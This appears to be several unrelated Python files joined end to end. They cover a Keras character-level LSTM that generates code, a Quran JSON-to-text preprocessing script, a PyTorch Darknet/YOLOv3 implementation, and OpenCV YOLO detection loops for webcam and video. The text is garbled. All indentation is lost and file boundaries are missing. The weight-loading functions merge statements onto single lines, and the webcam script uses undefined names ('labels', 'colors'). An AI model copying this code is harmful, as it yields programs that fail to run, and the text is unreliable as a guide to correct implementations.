# cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True
model = KerasClassifier(build_fn=rnn_model, input_dim=n_steps, cell=LSTM, num_layers=2, dropout=0.2, output_dim=vocab_size+1,
batch_normalization=True, bidirectional=True)
params = {
"units": [100, 128, 200, 256, 300]
}
grid = GridSearchCV(estimator=model, param_grid=params)
grid_result = grid.fit(X, Y)
print(grid_result.best_estimator_)
print(grid_result.best_params_)
print(grid_result.best_score_)
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed, Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True):
model = Sequential()
for i in range(num_layers):
if i == 0:
# first time, specify input_shape
# if bidirectional:
# model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
# else:
model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
else:
if i == num_layers - 1:
return_sequences = False
else:
return_sequences = True
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=return_sequences)))
else:
model.add(cell(units, return_sequences=return_sequences))
if batch_normalization:
model.add(BatchNormalization())
model.add(Dropout(dropout))
model.add(LeakyReLU(alpha=0.1))
model.add(Dense(output_dim, activation="softmax"))
model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
return model
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
from models import rnn_model
from keras.layers import LSTM
from utils import sequence_to_text, get_data
import numpy as np
import pickle
char2int = pickle.load(open("results/char2int.pickle", "rb"))
int2char = { v:k for k, v in char2int.items() }
print(int2char)
n_steps = 500
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def logits_to_text(logits):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
return int2char[np.argmax(logits, axis=0)]
# return ''.join([int2char[prediction] for prediction in np.argmax(logits, 1)])
def generate_code(model, initial_text, n_chars=100):
new_chars = ""
for i in range(n_chars):
x = np.array(text_to_sequence(initial_text))
x, _ = get_data(x, 64, n_steps, 1)
pred = model.predict(x)[0][0]
c = logits_to_text(pred)
new_chars += c
initial_text += c
return new_chars
model = rnn_model(input_dim=n_steps, output_dim=99, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
model.load_weights("results/rnn_3.5")
x = """x = np.array(text_to_sequence(x))
x, _ = get_data(x, n_steps, 1)
print(x.shape)
print(x.shape)
print(model.predict_proba(x))
print(model.predict_classes(x))
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_chars.char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, len(train_chars.vocab))
samples.append(train_chars.int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
if i == n_samples - 1 and char != " ":
# while char != "." and char != " ":
while char != " ":
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(cha
"""
# print(x.shape)
# print(x.shape)
# pred = model.predict(x)[0][0]
# print(pred)
# print(logits_to_text(pred))
# print(model.predict_classes(x))
print(generate_code(model, x, n_chars=500))
from models import rnn_model
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from utils import text_to_sequence, sequence_to_text, get_batches, read_data, get_data, get_data_length
import numpy as np
import os
text, int2char, char2int = read_data(load=False)
batch_size = 256
test_size = 0.2
n_steps = 500
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
train = get_batches(X_train, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
test = get_batches(X_test, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
for i, t in enumerate(train):
if i == 2:
break
print(t[0])
print(np.array(t[0]).shape)
# print(test.shape)
# # DIM = 28
# model = rnn_model(input_dim=n_steps, output_dim=vocab_size+1, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
# model.summary()
# model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
# if not os.path.isdir("results"):
# os.mkdir("results")
# checkpointer = ModelCheckpoint("results/rnn_{val_loss:.1f}", save_best_only=True, verbose=1)
# train_steps_per_epoch = get_data_length(X_train, n_steps, output_format="one") // batch_size
# test_steps_per_epoch = get_data_length(X_test, n_steps, output_format="one") // batch_size
# print("train_steps_per_epoch:", train_steps_per_epoch)
# print("test_steps_per_epoch:", test_steps_per_epoch)
# model.load_weights("results/rnn_3.2")
# model.fit_generator(train,
# epochs=30,
# validation_data=(test),
# steps_per_epoch=train_steps_per_epoch,
# validation_steps=test_steps_per_epoch,
# callbacks=[checkpointer],
# verbose=1)
# model.save("results/rnn_final.model")
import numpy as np
import tqdm
import pickle
from keras.utils import to_categorical
int2char, char2int = None, None
def read_data(load=False):
global int2char
global char2int
with open("E:\\datasets\\text\\my_python_code.py") as f:
text = f.read()
unique_chars = set(text)
if not load:
int2char = { i: c for i, c in enumerate(unique_chars, start=1) }
char2int = { c: i for i, c in enumerate(unique_chars, start=1) }
pickle.dump(int2char, open("results/int2char.pickle", "wb"))
pickle.dump(char2int, open("results/char2int.pickle", "wb"))
else:
int2char = pickle.load(open("results/int2char.pickle", "rb"))
char2int = pickle.load(open("results/char2int.pickle", "rb"))
return text, int2char, char2int
def get_batches(arr, batch_size, n_steps, vocab_size, output_format="many"):
'''Create a generator that returns batches of size
batch_size x n_steps from arr.
Arguments
---------
arr: Array you want to make batches from
batch_size: Batch size, the number of sequences per batch
n_steps: Number of sequence steps per batch
'''
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
if output_format == "many":
while True:
for n in range(0, arr.shape[1], n_steps):
x = arr[:, n: n+n_steps]
y_temp = arr[:, n+1:n+n_steps+1]
y = np.zeros(x.shape, dtype=y_temp.dtype)
y[:, :y_temp.shape[1]] = y_temp
yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
elif output_format == "one":
while True:
# X = np.zeros((arr.shape[1], n_steps))
# y = np.zeros((arr.shape[1], 1))
# for i in range(n_samples-n_steps):
# X[i] = np.array([ p.replace(",", "") if isinstance(p, str) else p for p in df.Price.iloc[i: i+n_steps] ])
# price = df.Price.iloc[i + n_steps]
# y[i] = price.replace(",", "") if isinstance(price, str) else price
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
y = np.expand_dims(y, axis=0)
yield x.reshape(1, x.shape[0], x.shape[1]), y
def get_data(arr, batch_size, n_steps, vocab_size):
# n_samples = len(arr) // n_seq
# X = np.zeros((n_seq, n_samples))
# Y = np.zeros((n_seq, n_samples))
chars_per_batch = batch_size * n_steps
n_batches = len(arr) // chars_per_batch
arr = arr[:chars_per_batch * n_batches]
arr = arr.reshape((batch_size, -1))
# for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
# x = arr[i:i+n_seq]
# y = arr[i+1:i+n_seq+1]
# if len(x) != n_seq or len(y) != n_seq:
# break
# X[:, index] = x
# Y[:, index] = y
X = np.zeros((batch_size, arr.shape[1]))
Y = np.zeros((batch_size, vocab_size))
for n in range(arr.shape[1] - n_steps-1):
x = arr[:, n: n+n_steps]
y = arr[:, n+n_steps+1]
# print("y.shape:", y.shape)
y = to_categorical(y, num_classes=vocab_size)
# print("y.shape after categorical:", y.shape)
# y = np.expand_dims(y, axis=1)
X[:, n: n+n_steps] = x
Y[n] = y
# yield x.reshape(1, x.shape[0], x.shape[1]), y
return np.expand_dims(X, axis=1), Y
# return n_samples
# return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_data_length(arr, n_seq, output_format="many"):
if output_format == "many":
return len(arr) // n_seq
elif output_format == "one":
return len(arr) - n_seq
def text_to_sequence(text):
global char2int
return [ char2int[c] for c in text ]
def sequence_to_text(sequence):
global int2char
return ''.join([ int2char[i] for i in sequence ])
import json
import os
import glob
CUR_DIR = os.getcwd()
text = ""
# for filename in os.listdir(os.path.join(CUR_DIR, "data", "json")):
surat = [ f"surah_{i}.json" for i in range(1, 115) ]
for filename in surat:
filename = os.path.join(CUR_DIR, "data", "json", filename)
file = json.load(open(filename, encoding="utf8"))
content = file['verse']
for verse_id, ayah in content.items():
text += f"{ayah}."
n_ayah = len(text.split("."))
n_words = len(text.split(" "))
n_chars = len(text)
print(f"Number of ayat: {n_ayah}, Number of words: {n_words}, Number of chars: {n_chars}")
with open("quran.txt", "w", encoding="utf8") as quran_file:
print(text, file=quran_file)
import torch
import torch.nn as nn
import numpy as np
# let us run this cell only if CUDA is available
# We will use torch.device objects to move tensors in and out of GPU
if torch.cuda.is_available():
x = torch.randn(1)
device = torch.device("cuda") # a CUDA device object
y = torch.ones_like(x, device=device) # directly create a tensor on GPU
x = x.to(device) # or just use strings .to("cuda")
z = x + y
print(z)
print(z.to("cpu", torch.double)) # .to can also change dtype together!
class YoloLayer(nn.Module):
def __init__(self, anchor_mask=[], num_classes=0, anchors=[], num_anchors=1):
super(YoloLayer, self).__init__()
self.anchor_mask = anchor_mask
self.num_classes = num_classes
self.anchors = anchors
self.num_anchors = num_anchors
self.anchor_step = len(anchors)/num_anchors
self.coord_scale = 1
self.noobject_scale = 1
self.object_scale = 5
self.class_scale = 1
self.thresh = 0.6
self.stride = 32
self.seen = 0
def forward(self, output, nms_thresh):
self.thresh = nms_thresh
masked_anchors = []
for m in self.anchor_mask:
masked_anchors += self.anchors[m*self.anchor_step:(m+1)*self.anchor_step]
masked_anchors = [anchor/self.stride for anchor in masked_anchors]
boxes = get_region_boxes(output.data, self.thresh, self.num_classes, masked_anchors, len(self.anchor_mask))
return boxes
class Upsample(nn.Module):
def __init__(self, stride=2):
super(Upsample, self).__init__()
self.stride = stride
def forward(self, x):
stride = self.stride
assert(x.data.dim() == 4)
B = x.data.size(0)
C = x.data.size(1)
H = x.data.size(2)
W = x.data.size(3)
ws = stride
hs = stride
x = x.view(B, C, H, 1, W, 1).expand(B, C, H, stride, W, stride).contiguous().view(B, C, H*stride, W*stride)
return x
#for route and shortcut
class EmptyModule(nn.Module):
def __init__(self):
super(EmptyModule, self).__init__()
def forward(self, x):
return x
# support route shortcut
class Darknet(nn.Module):
def __init__(self, cfgfile):
super(Darknet, self).__init__()
self.blocks = parse_cfg(cfgfile)
self.models = self.create_network(self.blocks) # merge conv, bn,leaky
self.loss = self.models[len(self.models)-1]
self.width = int(self.blocks[0]['width'])
self.height = int(self.blocks[0]['height'])
self.header = torch.IntTensor([0,0,0,0])
self.seen = 0
def forward(self, x, nms_thresh):
ind = -2
self.loss = None
outputs = dict()
out_boxes = []
for block in self.blocks:
ind = ind + 1
if block['type'] == 'net':
continue
elif block['type'] in ['convolutional', 'upsample']:
x = self.models[ind](x)
outputs[ind] = x
elif block['type'] == 'route':
layers = block['layers'].split(',')
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
x = outputs[layers[0]]
outputs[ind] = x
elif len(layers) == 2:
x1 = outputs[layers[0]]
x2 = outputs[layers[1]]
x = torch.cat((x1,x2),1)
outputs[ind] = x
elif block['type'] == 'shortcut':
from_layer = int(block['from'])
activation = block['activation']
from_layer = from_layer if from_layer > 0 else from_layer + ind
x1 = outputs[from_layer]
x2 = outputs[ind-1]
x = x1 + x2
outputs[ind] = x
elif block['type'] == 'yolo':
boxes = self.models[ind](x, nms_thresh)
out_boxes.append(boxes)
else:
print('unknown type %s' % (block['type']))
return out_boxes
def print_network(self):
print_cfg(self.blocks)
def create_network(self, blocks):
models = nn.ModuleList()
prev_filters = 3
out_filters =[]
prev_stride = 1
out_strides = []
conv_id = 0
for block in blocks:
if block['type'] == 'net':
prev_filters = int(block['channels'])
continue
elif block['type'] == 'convolutional':
conv_id = conv_id + 1
batch_normalize = int(block['batch_normalize'])
filters = int(block['filters'])
kernel_size = int(block['size'])
stride = int(block['stride'])
is_pad = int(block['pad'])
pad = (kernel_size-1)//2 if is_pad else 0
activation = block['activation']
model = nn.Sequential()
if batch_normalize:
model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad, bias=False))
model.add_module('bn{0}'.format(conv_id), nn.BatchNorm2d(filters))
else:
model.add_module('conv{0}'.format(conv_id), nn.Conv2d(prev_filters, filters, kernel_size, stride, pad))
if activation == 'leaky':
model.add_module('leaky{0}'.format(conv_id), nn.LeakyReLU(0.1, inplace=True))
prev_filters = filters
out_filters.append(prev_filters)
prev_stride = stride * prev_stride
out_strides.append(prev_stride)
models.append(model)
elif block['type'] == 'upsample':
stride = int(block['stride'])
out_filters.append(prev_filters)
prev_stride = prev_stride // stride
out_strides.append(prev_stride)
models.append(Upsample(stride))
elif block['type'] == 'route':
layers = block['layers'].split(',')
ind = len(models)
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
prev_filters = out_filters[layers[0]]
prev_stride = out_strides[layers[0]]
elif len(layers) == 2:
assert(layers[0] == ind - 1)
prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
prev_stride = out_strides[layers[0]]
out_filters.append(prev_filters)
out_strides.append(prev_stride)
models.append(EmptyModule())
elif block['type'] == 'shortcut':
ind = len(models)
prev_filters = out_filters[ind-1]
out_filters.append(prev_filters)
prev_stride = out_strides[ind-1]
out_strides.append(prev_stride)
models.append(EmptyModule())
elif block['type'] == 'yolo':
yolo_layer = YoloLayer()
anchors = block['anchors'].split(',')
anchor_mask = block['mask'].split(',')
yolo_layer.anchor_mask = [int(i) for i in anchor_mask]
yolo_layer.anchors = [float(i) for i in anchors]
yolo_layer.num_classes = int(block['classes'])
yolo_layer.num_anchors = int(block['num'])
yolo_layer.anchor_step = len(yolo_layer.anchors)//yolo_layer.num_anchors
yolo_layer.stride = prev_stride
out_filters.append(prev_filters)
out_strides.append(prev_stride)
models.append(yolo_layer)
else:
print('unknown type %s' % (block['type']))
return models
def load_weights(self, weightfile):
print()
fp = open(weightfile, 'rb')
header = np.fromfile(fp, count=5, dtype=np.int32)
self.header = torch.from_numpy(header)
self.seen = self.header[3]
buf = np.fromfile(fp, dtype = np.float32)
fp.close()
start = 0
ind = -2
counter = 3
for block in self.blocks:
if start >= buf.size:
break
ind = ind + 1
if block['type'] == 'net':
continue
elif block['type'] == 'convolutional':
model = self.models[ind]
batch_normalize = int(block['batch_normalize'])
if batch_normalize:
start = load_conv_bn(buf, start, model[0], model[1])
else:
start = load_conv(buf, start, model[0])
elif block['type'] == 'upsample':
pass
elif block['type'] == 'route':
pass
elif block['type'] == 'shortcut':
pass
elif block['type'] == 'yolo':
pass
else:
print('unknown type %s' % (block['type']))
percent_comp = (counter / len(self.blocks)) * 100
print('Loading weights. Please Wait...{:.2f}% Complete'.format(percent_comp), end = '\r', flush = True)
counter += 1
def convert2cpu(gpu_matrix):
return torch.FloatTensor(gpu_matrix.size()).copy_(gpu_matrix)
def convert2cpu_long(gpu_matrix):
return torch.LongTensor(gpu_matrix.size()).copy_(gpu_matrix)
def get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors, only_objectness = 1, validation = False):
anchor_step = len(anchors)//num_anchors
if output.dim() == 3:
output = output.unsqueeze(0)
batch = output.size(0)
assert(output.size(1) == (5+num_classes)*num_anchors)
h = output.size(2)
w = output.size(3)
all_boxes = []
output = output.view(batch*num_anchors, 5+num_classes, h*w).transpose(0,1).contiguous().view(5+num_classes, batch*num_anchors*h*w)
grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).type_as(output) #cuda()
xs = torch.sigmoid(output[0]) + grid_x
ys = torch.sigmoid(output[1]) + grid_y
anchor_w = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))
anchor_h = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))
anchor_w = anchor_w.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
anchor_h = anchor_h.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).type_as(output) #cuda()
ws = torch.exp(output[2]) * anchor_w
hs = torch.exp(output[3]) * anchor_h
det_confs = torch.sigmoid(output[4])
cls_confs = torch.nn.Softmax(dim=1)(output[5:5+num_classes].transpose(0,1)).detach()
cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)
cls_max_confs = cls_max_confs.view(-1)
cls_max_ids = cls_max_ids.view(-1)
sz_hw = h*w
sz_hwa = sz_hw*num_anchors
det_confs = convert2cpu(det_confs)
cls_max_confs = convert2cpu(cls_max_confs)
cls_max_ids = convert2cpu_long(cls_max_ids)
xs = convert2cpu(xs)
ys = convert2cpu(ys)
ws = convert2cpu(ws)
hs = convert2cpu(hs)
if validation:
cls_confs = convert2cpu(cls_confs.view(-1, num_classes))
for b in range(batch):
boxes = []
for cy in range(h):
for cx in range(w):
for i in range(num_anchors):
ind = b*sz_hwa + i*sz_hw + cy*w + cx
det_conf = det_confs[ind]
if only_objectness:
conf = det_confs[ind]
else:
conf = det_confs[ind] * cls_max_confs[ind]
if conf > conf_thresh:
bcx = xs[ind]
bcy = ys[ind]
bw = ws[ind]
bh = hs[ind]
cls_max_conf = cls_max_confs[ind]
cls_max_id = cls_max_ids[ind]
box = [bcx/w, bcy/h, bw/w, bh/h, det_conf, cls_max_conf, cls_max_id]
if (not only_objectness) and validation:
for c in range(num_classes):
tmp_conf = cls_confs[ind][c]
if c != cls_max_id and det_confs[ind]*tmp_conf > conf_thresh:
box.append(tmp_conf)
box.append(c)
boxes.append(box)
all_boxes.append(boxes)
return all_boxes
def parse_cfg(cfgfile):
blocks = []
fp = open(cfgfile, 'r')
block = None
line = fp.readline()
while line != '':
line = line.rstrip()
if line == '' or line[0] == '#':
line = fp.readline()
continue
elif line[0] == '[':
if block:
blocks.append(block)
block = dict()
block['type'] = line.lstrip('[').rstrip(']')
# set default value
if block['type'] == 'convolutional':
block['batch_normalize'] = 0
else:
key,value = line.split('=')
key = key.strip()
if key == 'type':
key = '_type'
value = value.strip()
block[key] = value
line = fp.readline()
if block:
blocks.append(block)
fp.close()
return blocks
def print_cfg(blocks):
print('layer filters size input output')
prev_width = 416
prev_height = 416
prev_filters = 3
out_filters =[]
out_widths =[]
out_heights =[]
ind = -2
for block in blocks:
ind = ind + 1
if block['type'] == 'net':
prev_width = int(block['width'])
prev_height = int(block['height'])
continue
elif block['type'] == 'convolutional':
filters = int(block['filters'])
kernel_size = int(block['size'])
stride = int(block['stride'])
is_pad = int(block['pad'])
pad = (kernel_size-1)//2 if is_pad else 0
width = (prev_width + 2*pad - kernel_size)//stride + 1
height = (prev_height + 2*pad - kernel_size)//stride + 1
print('%5d %-6s %4d %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'conv', filters, kernel_size, kernel_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'upsample':
stride = int(block['stride'])
filters = prev_filters
width = prev_width*stride
height = prev_height*stride
print('%5d %-6s * %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'upsample', stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'route':
layers = block['layers'].split(',')
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
print('%5d %-6s %d' % (ind, 'route', layers[0]))
prev_width = out_widths[layers[0]]
prev_height = out_heights[layers[0]]
prev_filters = out_filters[layers[0]]
elif len(layers) == 2:
print('%5d %-6s %d %d' % (ind, 'route', layers[0], layers[1]))
prev_width = out_widths[layers[0]]
prev_height = out_heights[layers[0]]
assert(prev_width == out_widths[layers[1]])
assert(prev_height == out_heights[layers[1]])
prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] in ['region', 'yolo']:
print('%5d %-6s' % (ind, 'detection'))
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'shortcut':
from_id = int(block['from'])
from_id = from_id if from_id > 0 else from_id+ind
print('%5d %-6s %d' % (ind, 'shortcut', from_id))
prev_width = out_widths[from_id]
prev_height = out_heights[from_id]
prev_filters = out_filters[from_id]
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
else:
print('unknown type %s' % (block['type']))
def load_conv(buf, start, conv_model):
num_w = conv_model.weight.numel()
num_b = conv_model.bias.numel()
conv_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data)) start = start + num_w
return start
def load_conv_bn(buf, start, conv_model, bn_model):
num_w = conv_model.weight.numel()
num_b = bn_model.bias.numel()
bn_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
bn_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
bn_model.running_mean.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
bn_model.running_var.copy_(torch.from_numpy(buf[start:start+num_b])) start = start + num_b
conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data)) start = start + num_w
return start
import cv2
import numpy as np
import time
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
config_path = "cfg/yolov3.cfg"
weights_path = "weights/yolov3.weights"
font_scale = 1
thickness = 1
LABELS = open("data/coco.names").read().strip().split("\n")
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3), dtype="uint8")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
cap = cv2.VideoCapture(0)
while True:
_, image = cap.read()
h, w = image.shape[:2]
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
net.setInput(blob)
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print("Time took:", time_took)
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
# loop over each of the object detections
for detection in output:
# extract the class id (label) and confidence (as a probability) of
# the current object detection
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
# discard weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > CONFIDENCE:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top and
# and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# draw a bounding box rectangle and label on the image
color = [int(c) for c in colors[class_ids[i]]]
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
# calculate text width & height to draw the transparent boxes as background of the text
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
text_offset_x = x
text_offset_y = y - 5
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
overlay = image.copy()
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
# add opacity (transparency to the box)
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
# now put the text (label: confidence %)
cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
cv2.imshow("image", image)
if ord("q") == cv2.waitKey(1):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import time
import sys
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
config_path = "cfg/yolov3.cfg"
weights_path = "weights/yolov3.weights"
font_scale = 1
thickness = 1
labels = open("data/coco.names").read().strip().split("\n")
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
ln = net.getLayerNames()
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
# read the file from the command line
video_file = sys.argv[1]
cap = cv2.VideoCapture(video_file)
_, image = cap.read()
h, w = image.shape[:2]
fourcc = cv2.VideoWriter_fourcc(*"XVID")
out = cv2.VideoWriter("output.avi", fourcc, 20.0, (w, h))
while True:
_, image = cap.read()
h, w = image.shape[:2]
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
net.setInput(blob)
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print("Time took:", time_took)
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
# loop over each of the object detections
for detection in output:
# extract the class id (label) and confidence (as a probability) of
# the current object detection
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
# discard weak predictions by ensuring the detected
# probability is greater than the minimum probability
if confidence > CONFIDENCE:
# scale the bounding box coordinates back relative to the
# size of the image, keeping in mind that YOLO actually
# returns the center (x, y)-coordinates of the bounding
# box followed by the boxes' width and height
box = detection[:4] * np.array([w, h, w, h])
(centerX, centerY, width, height) = box.astype("int")
# use the center (x, y)-coordinates to derive the top and
# and left corner of the bounding box
x = int(centerX - (width / 2))
y = int(centerY - (height / 2))
# update our list of bounding box coordinates, confidences,
# and class IDs
boxes.append([x, y, int(width), int(height)])
confidences.append(float(confidence))
class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
# loop over the indexes we are keeping
for i in idxs.flatten():
# extract the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# draw a bounding box rectangle and label on the image
color = [int(c) for c in colors[class_ids[i]]]
cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
# calculate text width & height to draw the transparent boxes as background of the text
(text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
text_offset_x = x
text_offset_y = y - 5
box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
overlay = image.copy()
cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
# add opacity (transparency to the box)
image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
# now put the text (label: confidence %)
